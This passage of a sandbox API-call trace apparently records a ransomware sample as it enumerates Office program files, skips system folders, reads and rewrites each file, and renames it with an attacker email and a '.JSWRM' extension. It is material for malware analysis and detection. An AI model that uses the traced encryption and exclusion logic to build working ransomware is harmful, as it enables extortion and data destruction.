[0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="documents and settings") returned 1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="system volume information") returned -1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="msocache") returned 1 [0129.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPT.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPT.FAE", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLAPPT.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPT.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPT.FAE", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLAPPT.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLAPPT.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olappt.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.568] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=125168) returned 1 [0129.569] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.569] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1e8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1e8f0, lpOverlapped=0x0) returned 1 [0129.578] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.578] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1e8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1e8f0, lpOverlapped=0x0) returned 1 [0129.578] CloseHandle (hObject=0x238) returned 1 [0129.578] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLAPPT.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olappt.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLAPPT.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olappt.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.580] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf466c4e5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf466c4e5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf466c4e5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12c80, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OLJRNL.FAE", cAlternateFileName="")) returned 1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2=".") returned 1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="..") returned 1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="...") returned 1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="windows") returned -1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="recovery") returned -1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="perflogs") returned -1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="documents and settings") returned 1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="system volume information") returned -1 [0129.580] lstrcmpiW (lpString1="OLJRNL.FAE", lpString2="msocache") returned 1 [0129.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNL.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNL.FAE", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLJRNL.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNL.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNL.FAE", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLJRNL.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLJRNL.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oljrnl.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.581] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=76928) returned 1 [0129.581] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.582] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12c80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x12c80, lpOverlapped=0x0) returned 1 [0129.589] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.589] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12c80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x12c80, lpOverlapped=0x0) returned 1 [0129.589] CloseHandle (hObject=0x238) returned 1 [0129.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLJRNL.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oljrnl.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLJRNL.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oljrnl.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.590] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d05722, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10a78, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OLMAIL.FAE", cAlternateFileName="")) returned 1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2=".") returned 1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="..") returned 1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="...") returned 1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="windows") returned -1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="recovery") returned -1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="perflogs") returned -1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="documents and settings") returned 1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="system volume information") returned -1 [0129.590] lstrcmpiW (lpString1="OLMAIL.FAE", lpString2="msocache") returned 1 [0129.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAIL.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAIL.FAE", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLMAIL.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAIL.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAIL.FAE", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLMAIL.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLMAIL.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olmail.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.592] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68216) returned 1 [0129.592] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.592] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10a70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10a70, lpOverlapped=0x0) returned 1 [0129.597] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.597] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10a70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10a70, lpOverlapped=0x0) returned 1 [0129.598] CloseHandle (hObject=0x238) returned 1 [0129.598] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLMAIL.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olmail.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLMAIL.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olmail.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.599] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe878, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OLNOTE.FAE", cAlternateFileName="")) returned 1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2=".") returned 1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="..") returned 1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="...") returned 1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="windows") returned -1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="recovery") returned -1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="perflogs") returned -1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="documents and settings") returned 1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="system volume information") returned -1 [0129.599] lstrcmpiW (lpString1="OLNOTE.FAE", lpString2="msocache") returned 1 [0129.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTE.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTE.FAE", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLNOTE.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTE.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTE.FAE", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLNOTE.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLNOTE.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olnote.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.601] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=59512) returned 1 [0129.601] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.601] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe870, lpOverlapped=0x0) returned 1 [0129.612] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.612] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe870, lpOverlapped=0x0) returned 1 [0129.613] CloseHandle (hObject=0x238) returned 1 [0129.613] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLNOTE.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olnote.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLNOTE.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\olnote.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.614] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc43098a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ce78, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OLTASK.FAE", cAlternateFileName="")) returned 1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2=".") returned 1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="..") returned 1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="...") returned 1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="windows") returned -1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="recovery") returned -1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="perflogs") returned -1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="documents and settings") returned 1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="system volume information") returned -1 [0129.614] lstrcmpiW (lpString1="OLTASK.FAE", lpString2="msocache") returned 1 [0129.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASK.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASK.FAE", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLTASK.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASK.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASK.FAE", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLTASK.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLTASK.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oltask.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.615] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=118392) returned 1 [0129.615] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.616] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1ce70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1ce70, lpOverlapped=0x0) returned 1 [0129.624] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.624] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1ce70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1ce70, lpOverlapped=0x0) returned 1 [0129.625] CloseHandle (hObject=0x238) returned 1 [0129.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLTASK.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oltask.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLTASK.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oltask.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.626] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc6b9190, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc6b9190, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc70564d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19248, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="RM.DLL", cAlternateFileName="")) returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2=".") returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="..") returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="...") returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="windows") returned -1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="recovery") returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="perflogs") returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="documents and settings") returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="system volume information") returned -1 [0129.626] lstrcmpiW (lpString1="RM.DLL", lpString2="msocache") returned 1 [0129.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RM.DLL", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RM.DLL", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RM.DLL", lpUsedDefaultChar=0x0) returned 6 [0129.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RM.DLL", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RM.DLL", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RM.DLL", lpUsedDefaultChar=0x0) returned 6 [0129.626] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x632fb8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x632fb8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24060, 